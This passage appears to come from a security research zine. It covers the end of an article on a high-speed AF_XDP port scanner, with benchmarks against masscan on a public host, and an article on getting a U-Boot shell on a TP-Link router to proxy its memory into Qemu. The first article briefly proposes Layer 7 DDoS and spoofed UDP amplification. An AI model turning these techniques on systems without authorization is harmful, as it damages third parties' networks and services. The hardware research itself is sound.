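        rxDescs := xsk.Receive(numRx) // descriptors for the ready packets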
        for _, desc := range rxDescs {
            frame := xsk.GetFrame(desc)
            ip, port, status := processPacket(frame)
            if status == "open" || status == "closed" {
                updateStatus(ip, port, status)
            }
        }
        // Return the now-empty frame descriptors to the kernel's FILL ring
        xsk.Fill(rxDescs)
    }
}
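
The classification step hidden behind processPacket can be sketched in
Python like this. It is an assumption about what such a function does, not
the PoC's code: a SYN+ACK reply is treated as "open", any RST as "closed",
and the name `classify_reply` is made up for the example.

```python
import struct


def classify_reply(frame: bytes):
    """Return (src_ip, src_port, status) for an IPv4/TCP frame, else None."""
    if len(frame) < 14 + 20 or frame[12:14] != b"\x08\x00":
        return None                      # too short or not IPv4
    ihl = (frame[14] & 0x0F) * 4         # IPv4 header length in bytes
    if ihl < 20 or frame[14 + 9] != 6:   # protocol 6 is TCP
        return None
    tcp = frame[14 + ihl:]
    if len(tcp) < 20:
        return None
    src_port = struct.unpack("!H", tcp[0:2])[0]
    flags = tcp[13]
    src_ip = ".".join(str(b) for b in frame[26:30])
    if flags & 0x04:                     # RST
        status = "closed"
    elif (flags & 0x12) == 0x12:         # SYN and ACK both set
        status = "open"
    else:
        status = "unknown"
    return src_ip, src_port, status
```

The reply's source address and port identify the scanned target, so they
are what gets recorded, not the destination fields.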


--[ 4 - Performance Analysis

---[ 4.0 - A Note on Benchmarking

To validate this architecture, a performance comparison is necessary. I
chose masscan as the benchmark, as it represents the gold standard for
high-speed, internet-scale scanning. It must be stated that masscan is a
mature, highly tuned project. It has years of optimization in its custom
networking code and supports advanced kernel-bypass techniques such as
PF_RING with DNA drivers. This driver DMAs packets directly from user-mode
memory to the network driver with zero kernel involvement, allowing it to
transmit at the maximum rate the hardware allows. Therefore, the goal here
is not to "beat" masscan, but to determine if an AF_XDP-based tool, even as
a proof-of-concept, can be competitive and where its architectural
strengths lie.

The benchmark consists of two scenarios: a high-density scan against a
single host (45.33.32.156) on all 65,535 ports, and a wide-range scan
against a /9 network (roughly 8.4 million IPs) on a single port.


---[ 4.1 - Head-to-Head: AF_XDP vs. masscan

A critical factor in masscan's design is a built-in 10-second delay at the
end of each scan to receive late-arriving packets.

--------------------------------------------------------------------------
    rate:  0.00-kpps, 100.00% done, waiting 10-secs, found=3 ~
--------------------------------------------------------------------------

When this delay is factored out to compare raw transmission times, the
results are revealing. For the wide-range /9 scan, masscan clocked in at
69.2 seconds total, meaning its active scanning time was only ~59.2
seconds.

--------------------------------------------------------------------------
    real        1m9.174s
--------------------------------------------------------------------------

My XDP scanner completed the same task in 68.3 seconds. In this scenario,
where the bottleneck is spread across millions of IPs, masscan's years of
optimization give it a clear edge.

However, the high-density scan against a single host tells a different
story. Here, masscan's active scanning time was ~2 seconds (12 seconds of
total time minus the 10-second delay).

--------------------------------------------------------------------------
    real        0m12.163s
--------------------------------------------------------------------------

My AF_XDP scanner finished in just ~1.3 seconds. The victory for the
AF_XDP scanner here was not just in speed, but also in accuracy. My scanner
consistently identified all four open ports on the target in every run:

--------------------------------------------------------------------------
    OPEN: 45.33.32.156:22
    OPEN: 45.33.32.156:9929
    OPEN: 45.33.32.156:80
    OPEN: 45.33.32.156:31337
--------------------------------------------------------------------------

In contrast, masscan's high rate caused it to miss ports, finding a
different number of open ports on different runs:

--------------------------------------------------------------------------
    1st scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=3
    2nd scan:  0.00-kpps, 100.00% done, waiting 0-secs, found=2
--------------------------------------------------------------------------
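
For a sense of scale, the timings quoted above can be turned into average
packet rates. The short Python calculation below assumes exactly one SYN
per target and no retransmissions, which the text does not state, and the
masscan single-host time is only the approximate "~2 seconds" figure.

```python
targets_wide = 2 ** (32 - 9)   # addresses in a /9
ports_dense = 65535            # ports probed on the single host


def kpps(packets, seconds):
    """Average rate in thousands of packets per second."""
    return packets / seconds / 1000


rates = {
    "masscan /9": kpps(targets_wide, 59.2),
    "AF_XDP /9": kpps(targets_wide, 68.3),
    "masscan single host": kpps(ports_dense, 2.0),
    "AF_XDP single host": kpps(ports_dense, 1.3),
}

for name, rate in rates.items():
    print(f"{name}: ~{rate:.0f} kpps")
```

Under those assumptions both tools sit in the low hundreds of kpps on the
wide scan, and in the tens of kpps on the single-host scan.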

This outcome supports the AF_XDP architecture. The performance gains are a
result of several combined optimizations. The kernel-level eBPF filter
picks out the scanner's replies at the earliest possible point and leaves
all other traffic to the regular stack. The zero-copy UMEM and batched ring
operations spread the cost of each syscall across many packets. This is
why the PoC excels in the high-density test: the per-packet overhead is so
low that it can saturate a single target more effectively and reliably than
a tool tuned for internet-wide distribution.

While the XDP scanner is just a proof-of-concept, it shows that with
further development, this architecture holds potential.

--[ 5 - Extending the AF_XDP Framework

---[ 5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS

The architecture developed for this scanner serves as a foundation for
other high-performance network applications, particularly for security
research and testing. The framework can be extended to handle stateful
protocols by implementing a TCP stack in userspace. This involves managing
sequence numbers, ACKs, windowing, and state transitions. This userspace
TCP stack then serves as a transport layer for higher-level protocols.

To interact with HTTPS services, a TLS library (e.g., OpenSSL) can be
integrated by redirecting its I/O from kernel sockets to the userspace TCP
stack. In OpenSSL, this can be done using a custom BIO (Basic I/O
abstraction). The BIO_read and BIO_write callbacks would then interface
with the userspace TCP stack's send/receive buffers, not with read() or
write() syscalls.
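
The same decoupling can be demonstrated without writing a custom BIO in C.
The sketch below swaps in Python's `ssl` module, whose `MemoryBIO` objects
keep the TLS engine away from any kernel socket. It is an analogy to the
OpenSSL approach described above, not the approach itself, and the
hostname is a placeholder.

```python
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
incoming = ssl.MemoryBIO()  # bytes received from the peer are written here
outgoing = ssl.MemoryBIO()  # bytes the TLS engine wants sent are read here
tls = ctx.wrap_bio(incoming, outgoing, server_hostname="example.com")

try:
    tls.do_handshake()
except ssl.SSLWantReadError:
    # Expected: the engine produced its first flight and now waits for
    # the server's answer to be fed in through incoming.write().
    pass

client_hello = outgoing.read()
# In the design described above, client_hello would be handed to the
# userspace TCP stack for transmission instead of to a kernel socket.
```

No socket is opened at any point; the caller decides how the bytes in
`outgoing` reach the network and how replies get into `incoming`.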

With such a setup, you could use AF_XDP to create a high-speed
application-layer fuzzer. For content discovery, one could pipeline a
massive number of fuzzed HTTP requests over multiple, persistent HTTPS
connections, achieving a request-per-second rate far higher than
conventional tools like ffuf or gobuster. This same capability can be used
for Layer 7 DDoS attacks, exhausting a target's resources by flooding it
with the highest RPS you can achieve.


---[ 5.1 - Stateless UDP Fuzzing and DDoS Amplification

UDP protocols are an even simpler target due to their stateless nature.
For these, the packet crafting engine can be adapted to fuzz any UDP
service or execute DDoS reflection/amplification attacks by spoofing the
source IP and generating requests at a massive rate. There's no complex
state to maintain, just packet generation.

In short, AF_XDP programs that speak UDP protocols are architecturally
easier to implement than their TCP counterparts. Several tools already use
this approach, for example to brute-force DNS records faster (e.g.
sanicdns, pugdns).
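
For the DNS case, the per-packet work is little more than serializing a
query. The Python sketch below builds the UDP payload of a standard DNS
question; it is not taken from sanicdns or pugdns, and the function name
and example hostname are assumptions.

```python
import struct


def build_dns_query(name: str, query_id: int, qtype: int = 1) -> bytes:
    """Return the payload of a recursive DNS query (default type A)."""
    # Header: id, flags (only RD set), one question, no other records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    # QNAME: each label is prefixed with its length, ended by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # class IN


query = build_dns_query("www.example.com", 0x1234)
```

A brute-forcer only has to vary the name and the query id per packet, then
match replies on that id.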


--[ 6 - Caveats and Considerations

This approach has several requirements and trade-offs. Root privileges (or
equivalent capabilities) are mandatory to load eBPF programs and create
AF_XDP sockets, so you won't be able to use it from an unprivileged
session. The implementation complexity is high, as your application is now
responsible for everything from ARP resolution to MAC address management.
Performance also relies heavily on having a modern kernel and a NIC driver
with native AF_XDP support; since that is a relatively recent kernel
feature, you won't be able to run it on every system.


--[ 7 - Conclusion

By combining the filtering capabilities of eBPF at the XDP hook with the
zero-copy architecture of AF_XDP, it is possible to build network
applications that far exceed the performance of traditional socket-based
programs. My port scanner serves as a practical example of this paradigm.
Unlike full bypass frameworks, AF_XDP provides a more universal and less
invasive path to high-performance packet processing by integrating
cooperatively with the mainline Linux kernel. The same principles that
enable my rapid network scanning also provide a foundation for security
research and attack tools.


--[ 8 - References


--[ 9 - Source Code

xdp.tar.gz



|=-----------------------------------------------------------------------=|
|=---------------------=[ 6 - MMIO in the Middle ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ b1ack0wl ]=-----------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of Contents

  0 - Introduction 
  1 - What sparked this research 
  2 - Looking into Das U-Boot 
  3 - Initial Testing 
  4 - Using Qemu to record MMIO transactions 
  5 - Discoveries 
  6 - Failed idea(s) 
  7 - Give this a try yourself!


--[ 0 - Introduction

Systems on Chip (SoCs) are very common in embedded devices, ranging from
cell phones to cheap smart devices. These chips contain many subcomponents
such as flash memory, network chips, modems, etc. These subcomponents are
interacted with via Memory Mapped Input Output (MMIO) regions, which is a
fancy way of saying "Memory Address 0x00000004 is mapped to register 'X'
for component 'Y'".

The target for this article is the TP-Link WR940N wireless router. This 
device has a fairly old processor in it, the "TP9343", which is actually
a Qualcomm Atheros QCA956x SoC. Even though the target device in this 
article is outdated, the technique I am about to describe can be applied 
to different types of embedded devices where the bootloader can easily be 
changed, or has the ability to read and write to physical memory.


--[ 1 - What sparked this research

A while back, @hyprdude and I were doing some reconnaissance on the router. 
hyprdude found that the GPL tarball [1] published by TP-Link was fully
loaded, and included the modified Linux kernel and Das U-Boot sources used 
on the device. 

This discovery sparked the idea of creating a custom Qemu board for this
particular chipset, which will help us understand the initial MMIO regions
that the bootloader reads from and writes to when it's first powered on
(e.g. making an LED blink different colors). A custom board will also give
us the ability to debug the kernel and kernel modules, because the pins
for E-JTAG were not working.

After looking at the bootloader's source code, it was obvious why the pins 
were not working. The following code is executed upon startup, which 
disables the E-JTAG ports on the device via multiplexing.

[board956x.c]
#define GPIO_FUNC  0x1804006c

/* set non-JTag */
li t0, GPIO_FUNC
lw t1, 0(t0)
li t2, (1<<1) /* we use GPIO14/GPIO15, so disable JTAG */
or t1, t1, t2
sw t1, 0(t0)


By looking at the code, we can note that the MMIO address 0x1804006c is the
`GPIO_FUNC` register. This register may be responsible for GPIO input 
multiplexing, but without a datasheet it's all just guesses from prior 
experiences.

Luckily, there was a datasheet posted on a Github repo [2] for the QCA9563 
chip, which specifies that `bit 1` at address `0x1804006c` is for disabling 
JTAG. Since we have the source code that actually compiles, we can simply 
modify Das U-Boot and enable JTAG. But, the goal is to achieve kernel 
debugging without touching the hardware, even though it should be possible 
to access E-JTAG before the above ASM statements are executed.
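
The assembly above is a plain read-modify-write on one bit. As a small
illustration, here is the same operation and its inverse in Python. The
starting register value is made up, and whether clearing the bit on a
running device is enough to bring E-JTAG back is an untested assumption.

```python
JTAG_DISABLE = 1 << 1  # bit 1 of GPIO_FUNC (0x1804006c)


def disable_jtag(gpio_func: int) -> int:
    """What the U-Boot code does: set bit 1, keep every other bit."""
    return gpio_func | JTAG_DISABLE


def enable_jtag(gpio_func: int) -> int:
    """The inverse: clear bit 1, keep every other bit (32-bit register)."""
    return gpio_func & ~JTAG_DISABLE & 0xFFFFFFFF


before = 0x00000040              # hypothetical register contents
after = disable_jtag(before)
restored = enable_jtag(after)
```

With physical memory access, the restored value is what would be written
back to `0x1804006c`.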


--[ 2 - Looking into Das U-Boot

While looking for more hints about the MMIO regions, I decided to analyze
the modified source code for the bootloader within the GPL tarball. 

If the following keywords are defined:

- `CONFIG_AUTOBOOT_KEYED`
- `CONFIG_BOOTDELAY`
- `CONFIG_AUTOBOOT_STOP_STR` or `CONFIG_AUTOBOOT_STOP_STR2`

Then the string defined in `CONFIG_AUTOBOOT_STOP_STR*` needs to be sent
to the console before the countdown defined in `CONFIG_BOOTDELAY` reaches
zero. (This reminds me of the game NFL Blitz, where you can punch in a code
before the match begins.)

For the WR940Nv6, the string `tpl` is defined and needs to be sent within
1 second after the `CONFIG_AUTOBOOT_PROMPT` is displayed. Doing this
manually has a low success rate, but using Python to spam the string `tpl`
over and over again via a serial adapter has a very high success rate!
This drops us into a Das U-Boot shell which gives us read and write access
to physical memory via the `md` and `mw` commands. Awesome!

The code for the `md` and `mw` commands can be found in 
`/ap151/boot/u-boot/common/cmd_mem.c` within the GPL tarball for the 
WR940Nv6.


--[ 3 - Initial Testing

To make sure that the newly discovered Das U-Boot shell can actually read
and write to physical memory I decided to write to address `0x18040008`
which corresponds to the `GPIO_OUT` register. This address is marked as 
"read-only" in the datasheet, so I looked at the Das U-Boot code to find 
any hints to help me confirm this is true. Within the `led.S` file the 
address `0x18040008` is labeled as `GPIO_OUT` which lines up with the 
datasheet, but then they write the value `0xc000` to it with a comment
that says that the LED will turn orange. 

The value `0xc000` has bits 14 and 15 set, which could mean that GPIO 
output ports 14 and 15 are "ON" which turns on the LED, but why is it 
orange? Well, the LED is a three pin multi-colored LED with two different 
colors, red (but it looks orange irl) and blue. By providing power to one 
of the pins, we can enable the red (orange) LED. Since this code is made 
to support different versions of the WR940N (which all have different LED 
configurations) they set both GPIO 14 and 15 to ON, but only one pin is 
needed to make the red LED turn on, so the red pin is connected to either 
GPIO pin 14 or 15. Through trial and error it was found that GPIO pin 14 
on the WR940Nv6 is the red LED and pin 19 is the blue LED! 

There's a statement within `led.S` that says to turn all of the "WAN" LEDs
blue via `~((1<<3) | (1<<14) | (1<<4) | (1<<5) | (1<<6) | (1<<7))`, and
through trial and error it was discovered that GPIO pin 19 turns on the
blue LED and setting pins 14 and 19 will make the LED turn purple! Even
though this test seems a bit silly, it verifies that the Das U-Boot shell
can write to MMIO regions and that they actually work! The following
diagram shows how the test was conducted:


   ||====[UART (Das U-Boot Shell)]
   ||                                  \    |    /
   vv 
+------------+                         /---------\
|            |---------GPIO 14------->|           |
|            |                         \   LED   /
|   QCA956x  |                          |   |   |
|            |---------GPIO 19------------->|   |
|            |-----------GND------------------->|
+------------+                          |   |   |
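
The bit arithmetic behind these LED experiments is easy to check with a
few lines of Python. The helper names are made up for this example; the
values are the ones quoted in the text.

```python
def set_bits(value: int) -> list:
    """List the positions of all set bits in a 32-bit value."""
    return [bit for bit in range(32) if (value >> bit) & 1]


def mask(*bits: int) -> int:
    """Build a register value with exactly the given bits set."""
    result = 0
    for bit in bits:
        result |= 1 << bit
    return result


orange_bits = set_bits(0xC000)   # value written by led.S
purple = mask(14, 19)            # red and blue pins together
wan_bits = mask(3, 14, 4, 5, 6, 7)  # operand of the ~(...) in led.S
```

`orange_bits` comes out as bits 14 and 15, and `purple` as `0x84000`, the
value with both the red and the blue pin selected.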


After this test, I created a Python script that connects to a UART serial
adapter via the `serial` module and accepts commands to read or write 4
bytes of data to memory via a TCP socket. Using this approach is expected
to be slow, but if this works then I can integrate all of it in C via
libftdi or libusb and eliminate the need for a socket and Python.
Make it work first, then make it fast later.


NOTE: The code below is only part of the final MITM Python script.

def read_from_phy_memory(ser, address):
  print(f'[*] Reading from Address: 0x{address:08X}...')
  ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
  out = get_response(ser)
  offset = out.rfind(bytes(f'{address:08x}: ',"UTF-8"))
  value = int(b'0x' +  out[offset + len(bytes(f'{address:08x}: ',
  "UTF-8")):offset + len(bytes(f'{address:08x}: ',"UTF-8")) + 8], 16)
  logging.debug(f"READ:  0x{address:08X}: 0x{value:08X}")
  return value

def write_to_phy_memory(ser, address, value):
  print(f'[*] Writing to Address: 0x{address:08X} with value \
  0x{value:08X}...')
  logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
  ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))

def listen_and_respond(ser, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  try:
    s.bind(("0.0.0.0", port))
  except socket.error as msg:
    # OSError is not subscriptable in Python 3; use its attributes.
    print(f'[-] Bind failed. Error Code : {msg.errno}'
          f' Message {msg.strerror}')
    return False
  s.listen(1)
  print (f'[*] Socket now listening on port {port}')
  while True:
    conn, addr = s.accept()
    msg = conn.recv(1024)
    while len(msg) > 0:
      if msg == b'exit\n':
        conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
        conn.close()
        break
      if msg == b'shutdown\n':
        conn.send(bytes('[*] The server is going down down\n', 
        "UTF-8"))
        conn.close()
        s.shutdown(socket.SHUT_WR)
        s.close()
        return
      elif msg[0] == ord('r'):
        # Read Bytes
        addr = int(msg[1:].strip(b'\n'), 16)
        out = read_from_phy_memory(ser, addr)
        conn.send(bytes(hex(out), "UTF-8"))
      elif msg[0] == ord('w'):
        # Write Bytes
        address = msg[1:].split(b" ")[0]
        value = msg[1:].split(b" ")[1].strip(b'\n')
        write_to_phy_memory(ser, int(address, 16), int(value, 16))
        conn.send(b'1')
      msg = conn.recv(1024)


--[ 4 - Using Qemu to record MMIO transactions

To help speed up development, I copied the `mipssim.c` board within the
`qemu/hw/mips` directory and used it as a skeleton. From there I reviewed
the documentation for Qemu to learn the memory APIs. All that is needed to
make an MMIO region is to first call `memory_region_init_io()` with the
MemoryRegion pointer (which comes from g_new(MemoryRegion, 1)), a struct
with the `.read` and `.write` callbacks populated (struct
MemoryRegionOps), the name of the region for Qemu to use (e.g. "DDR"), and
the size of the region. An owner Object can be supplied as the second
argument and an opaque pointer as the fourth; the opaque pointer is what
gets passed to the callbacks. Neither is needed at this stage, but the
opaque pointer will be needed when implementing the logic for the virtual
component. Lastly, `memory_region_add_subregion()` needs to be called for
the subregion to be applied to the main memory space (the return value of
get_system_memory()).

The following Qemu snippet demonstrates registering the subregion for the
GPIO registers:

[...]
/* MMIO Callbacks for GPIO */
// READ
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
  return 0; // return 0 for all reads in the GPIO region
}
// WRITE
static void gpio_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
  // The addr argument is an offset within the MMIO region
  // 0x44 == 0x18040044
  if (addr == 0x44){  // Skip this register since this breaks MITM MMIO
      return;
  }
  return;
}

// Struct for Callbacks + Endianness
static const MemoryRegionOps gpio_mmio_ops = {
    .read  = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// Get physical memory
MemoryRegion *address_space_mem = get_system_memory();
// Allocate and init GPIO region
MemoryRegion *gpio_mmio = g_new(MemoryRegion, 1);
memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, "GPIO_MMIO",
                      0x70);
// Add subregion to physical memory
memory_region_add_subregion(address_space_mem, 0x18040000LL, gpio_mmio);
// Reads and writes to GPIO will trigger the callbacks during runtime.
[...]


With the regions mapped with callbacks, the next step is to connect Qemu to
the MITM script. This can be accomplished while the virtual board is being
initialized by creating a socket, saving the socket fd, connecting to the
Python listener, and returning. Then, within the callbacks, the socket fd
is used to request reads and writes to physical memory from the Python
listener.


This is how it's all connected: 
+----------+       +----------+        +----------+         
|   Qemu   |<-TCP->|  Python  |<-UART->|  Router  | 
|          |       |          |        |  U-Boot  | 
+----------+       +----------+        +----------+
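
The requests that travel over the TCP leg of this chain are short text
commands: `r<address>` for a read and `w<address> <value>` for a write,
both in hex. A Python sketch of that wire format as pure functions follows.
The function names are made up for the example; the format itself mirrors
what the listener above parses.

```python
def encode_read(address: int) -> bytes:
    """Request a 4-byte read, e.g. b'r0x18040008'."""
    return f"r0x{address:x}".encode("ascii")


def encode_write(address: int, value: int) -> bytes:
    """Request a 4-byte write, e.g. b'w0x18040008 0x80000'."""
    return f"w0x{address:x} 0x{value:x}".encode("ascii")


def parse_command(msg: bytes):
    """Decode a request into ('r', addr) or ('w', addr, value)."""
    text = msg.decode("ascii").strip()
    if text.startswith("r"):
        return ("r", int(text[1:], 16))
    if text.startswith("w"):
        address, value = text[1:].split(" ", 1)
        return ("w", int(address, 16), int(value, 16))
    raise ValueError(f"unknown command: {text!r}")


request = encode_write(0x18040008, 0x80000)
decoded = parse_command(request)
```

Keeping the protocol this small is what makes it practical to call from
inside the Qemu read and write callbacks.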


Note: If a datasheet could not have been found for this SoC, I would have
registered one large MMIO callback region starting at the address that
crashes when running from a found entry point (e.g. Address: 0x18000000
Size: 0x18000000 [0x18000000-0x30000000]).

--[ 5 - Discoveries

The initial discovery that was already mentioned is that the datasheet and
source code don't line up 100%; it's more like 90%. Besides that, it was
found that the DDR region (0x18000000) is reported as 0x128 bytes in size,
but there's an additional register (DDR3_CONFIG) that lives at `0x1800015C`,
so there are either undocumented registers between offsets `0x128` and
`0x15C` or that particular memory space is unused.
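
The size of that gap is quick to work out. The Python snippet below does
the subtraction, assuming 32-bit registers, which is an assumption based on
the 4-byte accesses used throughout this article.

```python
DDR_BASE = 0x18000000
documented_size = 0x128        # region size according to the datasheet
ddr3_config = 0x1800015C       # register found in the source code

gap_bytes = (ddr3_config - DDR_BASE) - documented_size
gap_words = gap_bytes // 4     # how many 32-bit registers would fit
```

That leaves room for up to 13 undocumented 32-bit registers in front of
DDR3_CONFIG.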

Another discovery was a region that wasn't fully documented within the
datasheet. I've labeled it `GMAC1`; it lives at `0x1A000000` with size
`0x2E8`, and the values written to it are very close to the values written
to the `GMAC0` region (0x19000000).

The virtual device actually gets pretty far within the boot process, but
fails during the initialization of the WiFi driver. Since we're just
capturing MMIO transactions, the thing that's missing are the interrupts 
that need to be used when certain conditions happen for each subcomponent. 
(e.g. Raise an interrupt for when a certain register for a clock reaches 
zero during calibration.)

The GPIO address `0x18040044` is labeled `UART0_SIN Multiplexing` and its
purpose is to set which GPIO pins are used for UART0. During the boot
process this register is written to, which breaks the UART connection that
is used to interact with Das U-Boot. Adding a statement to skip offset
`0x44` for this region is needed to continue booting from Das U-Boot and
into Linux (virtually).

This approach allows us to utilize a component of the SoC in real life while
being able to emulate all of the other subcomponents that we're not
interested in. (e.g. utilize the device's Ethernet Ports + Controller, but
emulate the rest of the other subcomponents)

--[ 6 - Failed idea(s)

My first idea was to use `/dev/mem` to read and write to physical memory,
but attempting to write to physical memory would result in a segfault.
Reading from these regions was fine, but writing was a no-go. Plus, the OS
is fully loaded with running drivers, so these regions are constantly
being used. Attempting to read and write could cause unpredictable system
instability, so leveraging the bootloader seemed like a better idea. No
drivers, no OS, just GPIO pins :)

I then attempted to bit bang GPIO pins for E-JTAG with an Arduino nano, but
this resulted in nothing being found :(


--[ 7 - Give this a try yourself!

* Turn off the WR940Nv6
* Connect a serial adapter to the UART pins
  * Note: There are two jumpers that need to be soldered to complete the
    circuit for RX/TX
* Run the script below to drop the WR940Nv6 into the Das U-Boot shell
* Turn on the Router via the button on the back of the router
  * Note: If the script doesn't detect a shell within a few seconds then
    reboot the router and it should work
* Connect to TCP port 1337 once the script detects a Das U-Boot shell
* Send the string `w0x18040008 0x00080000` to turn the front LED blue
* Send the string `w0x18040008 0x00004000` to turn off the front LED
* Send `shutdown` to close the server socket and exit
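
The last steps can also be scripted instead of typed by hand. The Python
client below is a minimal sketch under the assumption that the MITM script
is already listening on 127.0.0.1:1337; `run_commands` and `main` are names
made up for this example, and the command strings are the ones listed
above.

```python
import socket

LED_BLUE = "w0x18040008 0x00080000"
LED_OFF = "w0x18040008 0x00004000"


def run_commands(conn, commands):
    """Send each command and collect the server's reply to it."""
    replies = []
    for command in commands:
        conn.sendall(command.encode("ascii"))
        replies.append(conn.recv(1024))
    return replies


def main(host="127.0.0.1", port=1337):
    # Requires the MITM script to be running and attached to the router.
    with socket.create_connection((host, port), timeout=5) as conn:
        print(run_commands(conn, [LED_BLUE, LED_OFF]))
```

Calling `main()` should print one reply per command; the listener answers
each write with `1`.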


* MMIO MITM Python Code:

import serial
import time
import socket
import logging

### CONSTS ###
GPIO_OUT = 0x18040008
logger = logging.getLogger(__name__)
logging.basicConfig(filename='bootup.log',
                    format='%(asctime)s;%(message)s',
                    datefmt="%H:%M:%S", filemode='w',
                    encoding='utf-8', level=logging.DEBUG)

def get_response(ser):
  time.sleep(0.02)
  out = b""
  while ser.inWaiting() > 0:
    out += ser.read(1)
  return out

def read_from_phy_memory(ser, address):
  print(f'[*] Reading from Address: 0x{address:08X}...')
  ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
  out = get_response(ser)
  offset = out.rfind(bytes(f'{address:08x}: ',"UTF-8"))
  value = int(b'0x' +  out[offset + len(bytes(f'{address:08x}: ',
  "UTF-8")):offset + len(bytes(f'{address:08x}: ',"UTF-8")) + 8], 16)
  logging.debug(f"READ:  0x{address:08X}: 0x{value:08X}")
  return value

def write_to_phy_memory(ser, address, value):
  print(f'[*] Writing to Address: 0x{address:08X} with value \
  0x{value:08X}...')
  logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
  ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))
  time.sleep(0.01)

def test_uboot_cmd_line(ser, test_string):
  ser.write(bytes(f"{test_string}\n","UTF-8"))
  out = get_response(ser)
  if bytes(f'Unknown command \'{test_string}\'', "UTF-8") in out:
    return True

def spam_tpl_for_uboot(ser, max_attempts):
  while True:
    ser.write(b'tpl')
    out = get_response(ser)
    if b"ap151>" in out:
      print(f"[+] Router is now in [REDACTED] state with \
      {max_attempts} attempts remaining.")
      return True
    max_attempts -= 1
    if max_attempts == 0:
      print("[-] Unable to get the router into the [REDACTED] state. \
      Try Rebooting...")
      return False

def listen_and_respond(ser, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  try:
    s.bind(("0.0.0.0", port))
  except socket.error as msg:
    # OSError is not subscriptable in Python 3; use its attributes.
    print(f'[-] Bind failed. Error Code : {msg.errno}'
          f' Message {msg.strerror}')
    return False
  s.listen(1)
  print (f'[*] Socket now listening on port {port}')
  while True:
    conn, addr = s.accept()
    msg = conn.recv(1024)
    while len(msg) > 0:
      if msg == b'exit\n':
        conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
        conn.close()
        break
      if msg == b'shutdown\n':
        conn.send(bytes('[*] The server is going down down\n', 
        "UTF-8"))
        conn.close()
        s.shutdown(socket.SHUT_WR)
        s.close()
        return
      elif msg[0] == ord('r'):
        # Read Bytes
        addr = int(msg[1:].strip(b'\n'), 16)
        out = read_from_phy_memory(ser, addr)
        conn.send(bytes(hex(out), "UTF-8"))
      elif msg[0] == ord('w'):
        # Write Bytes
        address = msg[1:].split(b" ")[0]
        value = msg[1:].split(b" ")[1].strip(b'\n')
        write_to_phy_memory(ser, int(address, 16), int(value, 16))
        conn.send(b'1')
      msg = conn.recv(1024)

def splash():
  print('[~  *  ~  [WR940N MMIO MITM]  ~  *  ~]')
  print('[>>>>>>>>>>> by: b1ack0wl <<<<<<<<<<<]')

def main():
  ser = serial.Serial(
    port='/dev/ttyUSB1', # Note: Change this for your USB serial device
    baudrate=115200
  )
  already_open = test_uboot_cmd_line(ser, "0wl")
  ser.isOpen()
  if (already_open != True):
    print(f'[*] Attempting to get the WR940N into the Das U-Boot shell...')
    if (spam_tpl_for_uboot(ser, 5000) == False):
      ser.close()
      return
  else:
    print(f"[*] Router is already in the Das U-boot shell :D")
  ser.write(b'\n\n')
  listen_and_respond(ser, 1337)

if __name__ == '__main__':
  splash()
  main()
  print('[*] - Done')


This is the Qemu board code.
* It needs to be put in the `qemu/hw/mips` folder. 
* NOTE: Only GPIO, SPI, and DDR are mapped, it is up to the reader to 
  complete the rest

/*
 * System emulation for the WR940N V6 board, but stripped for Phrack
 * by b1ack0wl <3
 */

#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/datadir.h"
#include "exec/address-spaces.h"
#include "hw/clock.h"
#include "hw/mips/mips.h"
#include "net/net.h"
#include "sysemu/sysemu.h"
#include "hw/boards.h"
#include "hw/loader.h"
#include "elf.h"
#include "hw/sysbus.h"
#include "hw/qdev-properties.h"
#include "qemu/error-report.h"
#include "sysemu/qtest.h"
#include "sysemu/reset.h"
#include "sysemu/runstate.h"
#include "cpu.h"
#include "hw/mips/wr940n.h"

int client_fd = 0; // global lol
#define BIOS_FILENAME "u-boot.bin"

static struct _loaderparams {
    int ram_size;
    const char *kernel_filename;
    const char *kernel_cmdline;
    const char *initrd_filename;
} loaderparams;

typedef struct ResetData {
    MIPSCPU *cpu;
    uint64_t vector;
} ResetData;

static uint64_t load_kernel(void)
{
    uint64_t entry, kernel_high, initrd_size;
    long kernel_size;
    ram_addr_t initrd_offset;

    kernel_size = load_elf(loaderparams.kernel_filename, NULL,
                           cpu_mips_kseg0_to_phys, NULL,
                           &entry, NULL,
                           &kernel_high, NULL, TARGET_BIG_ENDIAN,
                           EM_MIPS, 1, 0);
    if (kernel_size < 0) {
        error_report("could not load kernel '%s': %s",
                     loaderparams.kernel_filename,
                     load_elf_strerror(kernel_size));
        exit(1);
    }

    /* load initrd */
    initrd_size = 0;
    initrd_offset = 0;
    if (loaderparams.initrd_filename) {
        initrd_size = get_image_size(loaderparams.initrd_filename);
        if (initrd_size > 0) {
            initrd_offset = ROUND_UP(kernel_high, INITRD_PAGE_SIZE);
            if (initrd_offset + initrd_size > loaderparams.ram_size) {
                error_report(
                "memory too small for initial ram disk '%s'",
                             loaderparams.initrd_filename);
                exit(1);
            }
            initrd_size = load_image_targphys(
                loaderparams.initrd_filename,
                initrd_offset, loaderparams.ram_size - initrd_offset);
        }
